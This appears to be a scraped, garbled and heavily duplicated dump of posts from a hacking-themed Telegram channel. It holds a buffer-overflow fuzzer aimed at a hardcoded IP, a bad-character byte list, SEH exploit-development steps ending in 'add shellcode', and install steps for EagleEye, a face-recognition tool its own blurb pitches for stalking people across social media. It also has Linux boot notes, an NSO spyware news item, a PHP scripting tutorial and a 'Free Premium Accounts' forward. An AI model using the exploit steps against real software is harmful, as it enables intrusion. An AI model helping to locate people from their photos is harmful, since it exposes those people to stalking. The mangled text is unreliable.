"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86"
"\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95"
"\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4"
"\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3"
"\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe"
"\xff"
[+] Structured Exception Handler (SEH) Exploitation notes
- Crash the application
- Check SEH overwirte (view-seh chain)
- Find offset (!mona pattern_create <length>)
- Find certain SEH references to the cyclic pattern (!mona findmsp)
- Verify offset to NSEH (Next Exception)
- Find POP/POP/RET address with mona (!mona seh -cpb <bad chars>)
- Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding)
- Add shellcode to the payload
- Ensure existing padding to make sure the crash still happens.
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Exploit Development
----------------------
[+] Fuzzing:
import socket
buffer = ["A"]
counter = 50
while len(buffer) <= 1000:
buffer.append("A" * counter)
counter = counter + 50
for buffstring in buffer:
print "Fuzzing:" + str(len(buffstring))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect( ("192.168.0.20", 5555) )
sock.send(buffstring)
sock.close()
[+] Bad Character Testing:
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e"
"\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d"
"\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c"
"\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b"
"\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
"\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59"
"\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77"
"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86"
"\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95"
"\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4"
"\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3"
"\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe"
"\xff"
[+] Structured Exception Handler (SEH) Exploitation notes
- Crash the application
- Check SEH overwirte (view-seh chain)
- Find offset (!mona pattern_create <length>)
- Find certain SEH references to the cyclic pattern (!mona findmsp)
- Verify offset to NSEH (Next Exception)
- Find POP/POP/RET address with mona (!mona seh -cpb <bad chars>)
- Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding)
- Add shellcode to the payload
- Ensure existing padding to make sure the crash still happens.
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from Free Premium Accounts Telegram Channel - Netflix - Spotify
Please open Telegram to view this post
VIEW IN TELEGRAM
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦system boot Linux :
#FastTips
> The power-on self-test (BIOS)
self-tests the basic hard disk and finds the first bootable device
> MBR boot
Find the hard disk MBR boot partition and read GRUB information (where is grub.conf?)
> GRUB menu
Read grub.conf information, which contains kernel information (in /boot), waiting time, etc.
>Load kernel (kernel)
Load kernel and image files
> init process initialization
load initialization process 1 PID1
> The init process
is loaded and run by the Linux kernel /sbin/init program
is the first process
PID (process tag) number of the system is always 1
π¦repair MBR sector failure
β Cause of failure
Damage caused by viruses, Trojans, etc.
Incorrect partition operation, disk read and write operations
β Fault phenomenon
Bootloader not found, interrupted startup
Unable to load operating system, black screen after boot
β Coping ideas
Backup files should be prepared in advance
Boot into the emergency first aid mode with the installation CD
Restore from backup file
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦system boot Linux :
#FastTips
> The power-on self-test (BIOS)
self-tests the basic hard disk and finds the first bootable device
> MBR boot
Find the hard disk MBR boot partition and read GRUB information (where is grub.conf?)
> GRUB menu
Read grub.conf information, which contains kernel information (in /boot), waiting time, etc.
>Load kernel (kernel)
Load kernel and image files
> init process initialization
load initialization process 1 PID1
> The init process
is loaded and run by the Linux kernel /sbin/init program
is the first process
PID (process tag) number of the system is always 1
π¦repair MBR sector failure
β Cause of failure
Damage caused by viruses, Trojans, etc.
Incorrect partition operation, disk read and write operations
β Fault phenomenon
Bootloader not found, interrupted startup
Unable to load operating system, black screen after boot
β Coping ideas
Backup files should be prepared in advance
Boot into the emergency first aid mode with the installation CD
Restore from backup file
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
Follow Undercode Testing on :
> Twitter
> Twitter
> instagram
> Facebook
> Pinterest
> Linkedln
> Youtube
> Telegram
> Linkedln
> Youtube
> Telegram
Twitter
UNDERCODE TESTING {TRAINING} (@UndercodeTrain) | Twitter
The latest Tweets from UNDERCODE TESTING {TRAINING} (@UndercodeTrain). Expert Hacking | Training | Security | Hosting & much more ... @UndercodeNews @UndercodeTrain @iUndercode @DailyCve. Lebanon
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Israeli court ruled that NSO can continue to export spyware
#News
> According to foreign media reports, local time this Monday, the infamous spyware company NSO Group won a major victory in Israeli courts, and critics called it a disgraceful ruling. It is understood that the court finally ruled that NSO can continue to export its hacking and surveillance work on the grounds that the human rights organization Amnesty International failed to prove that NSO customers used these technologies to monitor Amnesty employees.
> Amnesty severely accused the ruling. Danna Ingleton, Acting Co-Director of Amnesty Tech, said: βTodayβs shameful ruling is a brutal blow to people who are at risk from the NSO Groupβs sale of its products to infamous human rights violators. At the NSO and the Israeli Ministry of Defence When the courts were responsible for their actions, it was shocking. The NSO Group will continue to profit from human rights violations without punishment. The courtβs ruling blatantly ignores the NSO Groupβs spyware used to attack Extensive evidence of human rights defenders from Saudi Arabia to Mexico and the basis of this case-our own Amnesty employees. We will continue to do our best to prevent NSO spyware from being used to violate human rights."
> The NSO is obviously happy with this victory. "This judgment is irrefutable evidence that it proves that the regulatory framework we are in conforms to the highest international standards. Combined with NSO's industry-leading governance framework, we are a global leader in the proper use of technology and respect for human rights This fact has been consolidated. The advanced encryption of terrorists and criminals necessitates this legal and appropriate response provided by NSOs to government agencies authorized to be licensed."
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Israeli court ruled that NSO can continue to export spyware
#News
> According to foreign media reports, local time this Monday, the infamous spyware company NSO Group won a major victory in Israeli courts, and critics called it a disgraceful ruling. It is understood that the court finally ruled that NSO can continue to export its hacking and surveillance work on the grounds that the human rights organization Amnesty International failed to prove that NSO customers used these technologies to monitor Amnesty employees.
> Amnesty severely accused the ruling. Danna Ingleton, Acting Co-Director of Amnesty Tech, said: βTodayβs shameful ruling is a brutal blow to people who are at risk from the NSO Groupβs sale of its products to infamous human rights violators. At the NSO and the Israeli Ministry of Defence When the courts were responsible for their actions, it was shocking. The NSO Group will continue to profit from human rights violations without punishment. The courtβs ruling blatantly ignores the NSO Groupβs spyware used to attack Extensive evidence of human rights defenders from Saudi Arabia to Mexico and the basis of this case-our own Amnesty employees. We will continue to do our best to prevent NSO spyware from being used to violate human rights."
> The NSO is obviously happy with this victory. "This judgment is irrefutable evidence that it proves that the regulatory framework we are in conforms to the highest international standards. Combined with NSO's industry-leading governance framework, we are a global leader in the proper use of technology and respect for human rights This fact has been consolidated. The advanced encryption of terrorists and criminals necessitates this legal and appropriate response provided by NSOs to government agencies authorized to be licensed."
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦for Facebook-Instagram:
> Image Recognition and Reverse Image Search Tool:
EagleEye basically performs face or image recognition over the provided image. When you enter the data such as name and a picture of a person with image recognition, it also matches the name on the social media like Facebook, YouTube, Twitter and Instagram. When it finds relevant results in the type of user profiles, it shows these results to its user. It can also search through secured and hidden profiles of persons on the social media.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£Debian-based Distros :
$ sudo apt update && sudo apt upgrade -y
$ sudo apt install git python3 python3-pip python3-dev
$ sudo apt install libgtk-3-dev libboost-all-dev build-essential cmake libffi-dev
$ git clone https://github.com/ThoughtfulDev/EagleEye
$ cd EagleEye && sudo pip3 install -r requirements.txt
$ sudo pip3 install --upgrade beautifulsoup4 html5lib spry
2οΈβ£Arch Linux :
$ sudo pacman -Syu
$ sudo pacman -S git python python-pip gtk3 boost cmake libffi
$ git clone https://github.com/ThoughtfulDev/EagleEye
$ cd EagleEye && sudo pip3 install -r requirements.txt
$ sudo pip3 install --upgrade beautifulsoup4 html5lib spry
3οΈβ£USAGE :
$ python3 eagle-eye.py -h
4οΈβ£Change the value in config.json to the path of the geckodriver e.g
{
"DEFAULTS": {
...
},
"WEBDRIVER": {
"ENGINE": "firefox",
"PATH": "/usr/local/bin/geckodriver"
},
"FILTER": [
....
],
...
}
5οΈβ£Configuration: Images
Put at least one Image of the Person you want to find in the known folder.
Supported Filetypes are: jpg/JPG, jpeg/JPEG, png/PNG, and bmp/BMP.
β GIT 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦for Facebook-Instagram:
> Image Recognition and Reverse Image Search Tool:
EagleEye basically performs face or image recognition over the provided image. When you enter the data such as name and a picture of a person with image recognition, it also matches the name on the social media like Facebook, YouTube, Twitter and Instagram. When it finds relevant results in the type of user profiles, it shows these results to its user. It can also search through secured and hidden profiles of persons on the social media.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£Debian-based Distros :
$ sudo apt update && sudo apt upgrade -y
$ sudo apt install git python3 python3-pip python3-dev
$ sudo apt install libgtk-3-dev libboost-all-dev build-essential cmake libffi-dev
$ git clone https://github.com/ThoughtfulDev/EagleEye
$ cd EagleEye && sudo pip3 install -r requirements.txt
$ sudo pip3 install --upgrade beautifulsoup4 html5lib spry
2οΈβ£Arch Linux :
$ sudo pacman -Syu
$ sudo pacman -S git python python-pip gtk3 boost cmake libffi
$ git clone https://github.com/ThoughtfulDev/EagleEye
$ cd EagleEye && sudo pip3 install -r requirements.txt
$ sudo pip3 install --upgrade beautifulsoup4 html5lib spry
3οΈβ£USAGE :
$ python3 eagle-eye.py -h
4οΈβ£Change the value in config.json to the path of the geckodriver e.g
{
"DEFAULTS": {
...
},
"WEBDRIVER": {
"ENGINE": "firefox",
"PATH": "/usr/local/bin/geckodriver"
},
"FILTER": [
....
],
...
}
5οΈβ£Configuration: Images
Put at least one Image of the Person you want to find in the known folder.
Supported Filetypes are: jpg/JPG, jpeg/JPEG, png/PNG, and bmp/BMP.
β GIT 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - ThoughtfulDev/EagleEye: Stalk your Friends. Find their Instagram, FB and Twitter Profiles using Image Recognition andβ¦
Stalk your Friends. Find their Instagram, FB and Twitter Profiles using Image Recognition and Reverse Image Search. - ThoughtfulDev/EagleEye
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Use PHP as Shell scripting language :
#ExpertHacking BY UNDERCODE
Many people may have thought of using PHP to write some programs such as regular letter sending, but there is no way to execute PHP regularly:
1) As we all know, PHP is a very good dynamic web development language (fast speed, short development cycle...). But only a few people realize that PHP can also be a good language for writing Shell scripts. When PHP is a language for writing Shell scripts, he is not as powerful as Perl or Bash, but he has a good advantage. Especially for people like me who are familiar with PHP but not very familiar with Perl.
2) To use PHP as the shell scripting language, you must compile PHP as a binary CGI, not Apache mode; compiling it into a binary CGI mode to run PHP has some security issues. For the solution, please refer to the PHP manual (http:/ /www.php.net).
At first you may feel uncomfortable with writing shell scripts, but it will get better: the only difference between using PHP as a general dynamic web page writing language and as a shell scripting language is that a shell script needs to be explained in the first line of life The program path of this script:
We added the parameter "-1" after the PHP execution file, so that PHP will not output HTTPHeader (if you still need to be a dynamic Web page of the Web, then you need to use the header function to output HTTPHeader yourself). Of course, you still need to use PHP start and end tags in the shell script:
<?php code?>
Let us now look at an example in order to better understand the use of PHP as the shell scripting language:
<?php
print("Hello, world!n");
?>
π¦The above program will simply output "Hello, world!" to the display.
1) Pass the Shell script running parameters to PHP:
As a Shell script, some parameters are often added when running the program. When PHP is used as a Shell script, there is an embedded array "$argv". Using the "$argv" array can be very convenient. Reads the parameters when the Shell script is running ("$argv[1]" corresponds to the first parameter, "$argv[2]" corresponds to the second parameter, and so on). For example, the following program:
#!/usr/local/bin/php -q
<?php
$first_name = $argv[1];
$last_name = $argv[2];
printf("Hello, %s %s! How are you today?n" , $first_name, $last_name);
?>
2) The above code needs two parameters when running, which are the first and last name, for example, run like this:
[dbrogdon@artemis dbrogdon]$ scriptname.ph Darrell Brogdon
Shell script will output on the display:
Hello, Darrell Brogdon! How are you today?
[dbrogdon@artemis dbrogdon]$
also contains the "$argv" array when PHP is used as a dynamic webpage writing language, but there are some differences from this: "$argv[0]" when PHP is used as the shell scripting language The corresponding is the file name of the script, and when used for dynamic web page writing, "$argv[1]" corresponds to the first parameter of QueryString.
3) Write an interactive shell script:
If a shell script is only run by itself and loses its interactivity, then it doesn't make much sense. When PHP is used to write shell scripts, how to read the information entered by the user? Unfortunately, PHP itself does not have a function or method to read user input information, but we can imitate other languages ββto write a function "read" that reads user input information:
<?php
function read() {
$fp = fopen('/dev/stdin','r');
$input = fgets($fp, 255);
fclose($fp);
return $input;
}
?>
π¦Use PHP as Shell scripting language :
#ExpertHacking BY UNDERCODE
Many people may have thought of using PHP to write some programs such as regular letter sending, but there is no way to execute PHP regularly:
1) As we all know, PHP is a very good dynamic web development language (fast speed, short development cycle...). But only a few people realize that PHP can also be a good language for writing Shell scripts. When PHP is a language for writing Shell scripts, he is not as powerful as Perl or Bash, but he has a good advantage. Especially for people like me who are familiar with PHP but not very familiar with Perl.
2) To use PHP as the shell scripting language, you must compile PHP as a binary CGI, not Apache mode; compiling it into a binary CGI mode to run PHP has some security issues. For the solution, please refer to the PHP manual (http:/ /www.php.net).
At first you may feel uncomfortable with writing shell scripts, but it will get better: the only difference between using PHP as a general dynamic web page writing language and as a shell scripting language is that a shell script needs to be explained in the first line of life The program path of this script:
We added the parameter "-1" after the PHP execution file, so that PHP will not output HTTPHeader (if you still need to be a dynamic Web page of the Web, then you need to use the header function to output HTTPHeader yourself). Of course, you still need to use PHP start and end tags in the shell script:
<?php code?>
Let us now look at an example in order to better understand the use of PHP as the shell scripting language:
<?php
print("Hello, world!n");
?>
π¦The above program will simply output "Hello, world!" to the display.
1) Pass the Shell script running parameters to PHP:
As a Shell script, some parameters are often added when running the program. When PHP is used as a Shell script, there is an embedded array "$argv". Using the "$argv" array can be very convenient. Reads the parameters when the Shell script is running ("$argv[1]" corresponds to the first parameter, "$argv[2]" corresponds to the second parameter, and so on). For example, the following program:
#!/usr/local/bin/php -q
<?php
$first_name = $argv[1];
$last_name = $argv[2];
printf("Hello, %s %s! How are you today?n" , $first_name, $last_name);
?>
2) The above code needs two parameters when running, which are the first and last name, for example, run like this:
[dbrogdon@artemis dbrogdon]$ scriptname.ph Darrell Brogdon
Shell script will output on the display:
Hello, Darrell Brogdon! How are you today?
[dbrogdon@artemis dbrogdon]$
also contains the "$argv" array when PHP is used as a dynamic webpage writing language, but there are some differences from this: "$argv[0]" when PHP is used as the shell scripting language The corresponding is the file name of the script, and when used for dynamic web page writing, "$argv[1]" corresponds to the first parameter of QueryString.
3) Write an interactive shell script:
If a shell script is only run by itself and loses its interactivity, then it doesn't make much sense. When PHP is used to write shell scripts, how to read the information entered by the user? Unfortunately, PHP itself does not have a function or method to read user input information, but we can imitate other languages ββto write a function "read" that reads user input information:
<?php
function read() {
$fp = fopen('/dev/stdin','r');
$input = fgets($fp, 255);
fclose($fp);
return $input;
}
?>